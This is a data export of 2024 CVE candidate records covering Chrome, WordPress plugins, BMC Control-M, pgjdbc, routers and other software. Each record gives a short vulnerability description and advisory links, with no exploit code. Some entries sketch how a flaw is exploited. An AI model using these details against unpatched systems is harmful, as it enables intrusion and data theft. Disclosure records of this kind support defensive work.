CVE    2024    1674    Candidate    Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/40095183   |   URL:https://issues.chromium.org/issues/40095183    Assigned (20240220)
CVE    2024    1673    Candidate    Use after free in Accessibility in Google Chrome prior to 122.0.6261.57 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via specific UI gestures. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41490491   |   URL:https://issues.chromium.org/issues/41490491    Assigned (20240220)
CVE    2024    1672    Candidate    Inappropriate implementation in Content Security Policy in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41485789   |   URL:https://issues.chromium.org/issues/41485789    Assigned (20240220)
CVE    2024    1671    Candidate    Inappropriate implementation in Site Isolation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41487933   |   URL:https://issues.chromium.org/issues/41487933    Assigned (20240220)
CVE    2024    1670    Candidate    Use after free in Mojo in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41481374   |   URL:https://issues.chromium.org/issues/41481374    Assigned (20240220)
CVE    2024    1669    Candidate    Out of bounds memory access in Blink in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   FEDORA:FEDORA-2024-6a879cfa63   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWWBMVQTSERVBXSXCZVUKIMEDNQUQ7O3/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop_20.html   |   MISC:https://issues.chromium.org/issues/41495060   |   URL:https://issues.chromium.org/issues/41495060    Assigned (20240220)
CVE    2024    1668    Candidate    The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 7.11.5 via the form entries page. This makes it possible for authenticated attackers, with contributor access and above, to view the contents of all form submissions, including fields that are obfuscated (such as the contact form's "password" field).    MISC:https://gist.github.com/Xib3rR4dAr/91bd37338022b15379f393356d1056a1   |   URL:https://gist.github.com/Xib3rR4dAr/91bd37338022b15379f393356d1056a1   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd224169-ae51-4af8-b6de-706ed580ff8d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd224169-ae51-4af8-b6de-706ed580ff8d?source=cve    Assigned (20240220)
CVE    2024    1661    Candidate    A vulnerability classified as problematic was found in Totolink X6000R 9.4.0cu.852_B20230719. Affected by this vulnerability is an unknown functionality of the file /etc/shadow. The manipulation leads to hard-coded credentials. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254179. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254179 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254179   |   MISC:VDB-254179 | Totolink X6000R shadow hard-coded credentials   |   URL:https://vuldb.com/?id.254179   |   MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-Totolink/X6000R-Hardcoded-Password.md   |   URL:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-Totolink/X6000R-Hardcoded-Password.md    Assigned (20240220)
CVE    2024    1658    Candidate    The Grid Shortcodes WordPress plugin before 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/9489925e-5a47-4608-90a2-0139c5e1c43c/   |   URL:https://wpscan.com/vulnerability/9489925e-5a47-4608-90a2-0139c5e1c43c/    Assigned (20240220)
CVE    2024    1654    Candidate    This vulnerability potentially allows unauthorized write operations which may lead to remote code execution. An attacker must already have authenticated admin access and knowledge of both an internal system identifier and details of another valid user to exploit this.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240220)
CVE    2024    1653    Candidate    The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxUpdateFolderPosition in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the folder position of categories as well as update the metadata of other taxonomies.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve    Assigned (20240219)
CVE    2024    1652    Candidate    The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxClearCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear categories.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve    Assigned (20240219)
CVE    2024    1651    Candidate    Torrentpier version 2.4.1 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to insecure deserialization.    MISC:https://fluidattacks.com/advisories/xavi/   |   URL:https://fluidattacks.com/advisories/xavi/   |   MISC:https://github.com/torrentpier/torrentpier   |   URL:https://github.com/torrentpier/torrentpier    Assigned (20240219)
CVE    2024    1650    Candidate    The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxRenameCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to rename categories.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve    Assigned (20240219)
CVE    2024    1649    Candidate    The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxDeleteCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete categories.    MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve    Assigned (20240219)
CVE    2024    1648    Candidate    electron-pdf version 20.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user.    MISC:https://fluidattacks.com/advisories/drake   |   URL:https://fluidattacks.com/advisories/drake   |   MISC:https://www.npmjs.com/package/electron-pdf/   |   URL:https://www.npmjs.com/package/electron-pdf/    Assigned (20240219)
CVE    2024    1647    Candidate    Pyhtml2pdf version 0.0.6 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user.    MISC:https://fluidattacks.com/advisories/oliver/   |   URL:https://fluidattacks.com/advisories/oliver/   |   MISC:https://pypi.org/project/pyhtml2pdf/   |   URL:https://pypi.org/project/pyhtml2pdf/    Assigned (20240219)
CVE    2024    1645    Candidate    The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to export payment data collected by this plugin.    MISC:https://plugins.trac.wordpress.org/browser/mollie-forms/trunk/classes/Admin.php#L904   |   URL:https://plugins.trac.wordpress.org/browser/mollie-forms/trunk/classes/Admin.php#L904   |   MISC:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve    Assigned (20240219)
CVE    2024    1644    Candidate    Suite CRM version 7.14.2 allows including local php files. This is possible because the application is vulnerable to LFI.    MISC:https://fluidattacks.com/advisories/silva/   |   URL:https://fluidattacks.com/advisories/silva/   |   MISC:https://github.com/salesagility/SuiteCRM/   |   URL:https://github.com/salesagility/SuiteCRM/    Assigned (20240219)
CVE    2024    1642    Candidate    The MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1. This is due to missing or incorrect nonce validation on the 'posting_bulk' function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/mainwp/tags/4.6.0.1/pages/page-mainwp-post-page-handler.php   |   URL:https://plugins.trac.wordpress.org/browser/mainwp/tags/4.6.0.1/pages/page-mainwp-post-page-handler.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3042125/mainwp/trunk/pages/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp/trunk/pages/page-mainwp-post-page-handler.php   |   URL:https://plugins.trac.wordpress.org/changeset/3042125/mainwp/trunk/pages/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp/trunk/pages/page-mainwp-post-page-handler.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve    Assigned (20240219)
CVE    2024    1640    Candidate    The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to insufficient user validation on the bitforms_update_form_entry AJAX action in all versions up to, and including, 2.10.1. This makes it possible for unauthenticated attackers to modify form submissions.    MISC:https://plugins.trac.wordpress.org/changeset/3048523/bit-form/trunk/includes/Frontend/Ajax/FrontendAjax.php   |   URL:https://plugins.trac.wordpress.org/changeset/3048523/bit-form/trunk/includes/Frontend/Ajax/FrontendAjax.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve    Assigned (20240219)
CVE    2024    1638    Candidate    The documentation specifies that the BT_GATT_PERM_READ_LESC and BT_GATT_PERM_WRITE_LESC defines for a Bluetooth characteristic: Attribute read/write permission with LE Secure Connection encryption. If set, requires that LE Secure Connections is used for read/write access, however this is only true when it is combined with other permissions, namely BT_GATT_PERM_READ_ENCRYPT/BT_GATT_PERM_READ_AUTHEN (for read) or BT_GATT_PERM_WRITE_ENCRYPT/BT_GATT_PERM_WRITE_AUTHEN (for write), if these additional permissions are not set (even in secure connections only mode) then the stack does not perform any permission checks on these characteristics and they can be freely written/read.    MISC:https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p6f3-f63q-5mc2   |   URL:https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p6f3-f63q-5mc2    Assigned (20240219)
CVE    2024    1636    Candidate    Potential Cross-Site Scripting (XSS) in the page editing area.    MISC:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024   |   URL:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024   |   MISC:https://www.progress.com/sitefinity-cms   |   URL:https://www.progress.com/sitefinity-cms    Assigned (20240219)
CVE    2024    1635    Candidate    A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. At HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.    CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0007/   |   MISC:RHBZ#2264928   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264928   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1635   |   URL:https://access.redhat.com/security/cve/CVE-2024-1635    Assigned (20240219)
CVE    2024    1633    Candidate    During the secure boot, bl2 (the second stage of the bootloader) loops over images defined in the table “bl2_mem_params_descs”. For each image, the bl2 reads the image length and destination from the image’s certificate. Because of the way of reading from the image, which is based on a 32-bit unsigned integer value, it can result in an integer overflow. An attacker can bypass memory range restriction and write data out of buffer bounds, which could result in bypass of secure boot. Affected git version from c2f286820471ed276c57e603762bd831873e5a17 until (not    MISC:https://asrg.io/security-advisories/CVE-2024-1633/   |   URL:https://asrg.io/security-advisories/CVE-2024-1633/    Assigned (20240219)
CVE    2024    1632    Candidate    Low-privileged users with access to the Sitefinity backend may obtain sensitive information from the site's administrative area.    MISC:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024   |   URL:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024   |   MISC:https://www.progress.com/sitefinity-cms   |   URL:https://www.progress.com/sitefinity-cms    Assigned (20240219)
CVE    2024    1631    Candidate    Impact: The library offers a function to generate an ed25519 key pair via Ed25519KeyIdentity.generate with an optional param to provide a 32 byte seed value, which will then be used as the secret key. When no seed value is provided, it is expected that the library generates the secret key using secure randomness. However, a recent change broke this guarantee and uses an insecure seed for key pair generation. Since the private key of this identity (535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe) is compromised, one could lose funds associated with the principal on ledgers or lose access to a canister where this principal is the controller.    MISC:https://agent-js.icp.xyz/identity/index.html   |   URL:https://agent-js.icp.xyz/identity/index.html   |   MISC:https://github.com/dfinity/agent-js   |   URL:https://github.com/dfinity/agent-js   |   MISC:https://github.com/dfinity/agent-js/pull/851   |   URL:https://github.com/dfinity/agent-js/pull/851   |   MISC:https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3   |   URL:https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3   |   MISC:https://www.npmjs.com/package/@dfinity/identity/v/1.0.1   |   URL:https://www.npmjs.com/package/@dfinity/identity/v/1.0.1    Assigned (20240219)
CVE    2024    1624    Candidate    An OS Command Injection vulnerability affecting documentation server on 3DEXPERIENCE from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x, SIMULIA Abaqus from Release 2022 through Release 2024, SIMULIA Isight from Release 2022 through Release 2024 and CATIA Composer from Release R2023 through Release R2024. A specially crafted HTTP request can lead to arbitrary command execution.    MISC:https://www.3ds.com/vulnerability/advisories   |   URL:https://www.3ds.com/vulnerability/advisories    Assigned (20240219)
CVE    2024    1623    Candidate    Insufficient session timeout vulnerability in the FAST3686 V2 Vodafone router from Sagemcom. This vulnerability could allow a local attacker to access the administration panel without requiring login credentials. This vulnerability is possible because the 'Login.asp and logout.asp' files do not handle session details correctly.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/insufficient-session-timeout-vulnerability-sagemcom-router   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/insufficient-session-timeout-vulnerability-sagemcom-router    Assigned (20240219)
CVE    2024    1622    Candidate    Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening.    FEDORA:FEDORA-2024-1f5908a311   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K52QRRYBHLP73RAS3CGOPBWYT7EZVP6O/   |   FEDORA:FEDORA-2024-28a151028a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N2N3N3SNBHSH7GN3JOLR7YUF5FCTQQ5O/   |   FEDORA:FEDORA-2024-d20ff4a09b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4HPRUIPAI2BBDGFVLN733JLIUJWLEBLF/   |   MISC:https://www.nlnetlabs.nl/downloads/routinator/CVE-2024-1622.txt   |   URL:https://www.nlnetlabs.nl/downloads/routinator/CVE-2024-1622.txt    Assigned (20240219)
CVE    2024    1619    Candidate    Kaspersky has fixed a security issue in the Kaspersky Security 8.0 for Linux Mail Server. The issue was that an attacker could potentially force an administrator to click on a malicious link to perform unauthorized actions.    MISC:Advisory issued on February 1, 2024   |   URL:https://support.kaspersky.com/vulnerability/list-of-advisories/12430#010224    Assigned (20240219)
CVE    2024    1618    Candidate    A search path or unquoted item vulnerability in Faronics Deep Freeze Server Standard, which affects versions 8.30.020.4627 and earlier. This vulnerability affects the DFServ.exe file. An attacker with local user privileges could exploit this vulnerability to replace the legitimate DFServ.exe service executable with a malicious file of the same name and located in a directory that has a higher priority than the legitimate directory. Thus, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system or stop the service from running.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/unquoted-item-or-search-path-vulnerability-faronics-deep-freeze-server   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/unquoted-item-or-search-path-vulnerability-faronics-deep-freeze-server    Assigned (20240219)
CVE    2024    1608    Candidate    In OPPO Usercenter Credit SDK, there's a possible escalation of privilege due to a loose permission check. This could lead to application internal information leak without user interaction.    MISC:https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1759867611954552832   |   URL:https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1759867611954552832    Assigned (20240219)
CVE    2024    1606    Candidate    Lack of input sanitization in BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users to manipulate generated web pages via injection of HTML code. This might lead to a successful phishing attack, for example by tricking users into using a hyperlink pointing to a website controlled by an attacker. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.200.    MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/posts/2024/03/CVE-2024-1604   |   MISC:https://www.bmc.com/it-solutions/control-m.html   |   URL:https://www.bmc.com/it-solutions/control-m.html    Assigned (20240218)
CVE    2024    1605    Candidate    BMC Control-M branches 9.0.20 and 9.0.21, upon user login, load all Dynamic Link Libraries (DLL) from a directory that grants Write and Read permissions to all users. Leveraging this leads to loading of potentially malicious libraries, which will execute with the application's privileges. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.201.    MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/posts/2024/03/CVE-2024-1604   |   MISC:https://www.bmc.com/it-solutions/control-m.html   |   URL:https://www.bmc.com/it-solutions/control-m.html    Assigned (20240218)
CVE    2024    1604    Candidate    Improper authorization in the report management and creation module of BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users to read and make unauthorized changes to any reports available within the application, even without proper permissions. The attacker must know the unique identifier of the report they want to manipulate. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.201.    MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-1604   |   URL:https://cert.pl/posts/2024/03/CVE-2024-1604   |   MISC:https://www.bmc.com/it-solutions/control-m.html   |   URL:https://www.bmc.com/it-solutions/control-m.html    Assigned (20240218)
CVE    2024    1603    Candidate    paddlepaddle/paddle 2.6.0 allows arbitrary file read via paddle.vision.ops.read_file.    MISC:https://huntr.com/bounties/7739eced-73a3-4a96-afcd-9c753c55929e   |   URL:https://huntr.com/bounties/7739eced-73a3-4a96-afcd-9c753c55929e    Assigned (20240218)
CVE    2024    1597    Candidate    pgjdbc, the PostgreSQL JDBC Driver, allows an attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query, bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.    FEDORA:FEDORA-2024-ed884c3203   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TZQTSMESZD2RJ5XBPSXH3TIQVUW5DIUU/   |   MISC:https://www.enterprisedb.com/docs/jdbc_connector/latest/01_jdbc_rel_notes/   |   MISC:https://www.enterprisedb.com/docs/security/assessments/cve-2024-1597/   |   MISC:https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56   |   URL:https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56    Assigned (20240216)
CVE    2024    1595    Candidate    Delta Electronics CNCSoft-B DOPSoft prior to v4.0.0.82 insecurely loads libraries, which may allow an attacker to use DLL hijacking and take over the system where the software is installed.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-053-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-053-01    Assigned (20240216)
CVE    2024    1592    Candidate    The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.6. This is due to missing or incorrect nonce validation on the process_delete function in class-DNSMPD.php. This makes it possible for unauthenticated attackers to delete GDPR data requests via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve    Assigned (20240216)
CVE    2024    1591    Candidate    Prior to version 24.1, a local authenticated attacker can view Sysvol when Privilege Management for Windows is configured to use a GPO policy. This allows them to view the policy and potentially find configuration issues.    MISC:https://www.beyondtrust.com/trust-center/security-advisories/bt24-02   |   URL:https://www.beyondtrust.com/trust-center/security-advisories/bt24-02    Assigned (20240216)
CVE    2024    1590    Candidate    The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Widget in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve    Assigned (20240216)
CVE    2024    1586    Candidate    The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom schema in all versions up to, and including, 1.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default the required authentication level is admin, but administrators have the ability to assign role based access to users as low as subscriber.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve    Assigned (20240216)
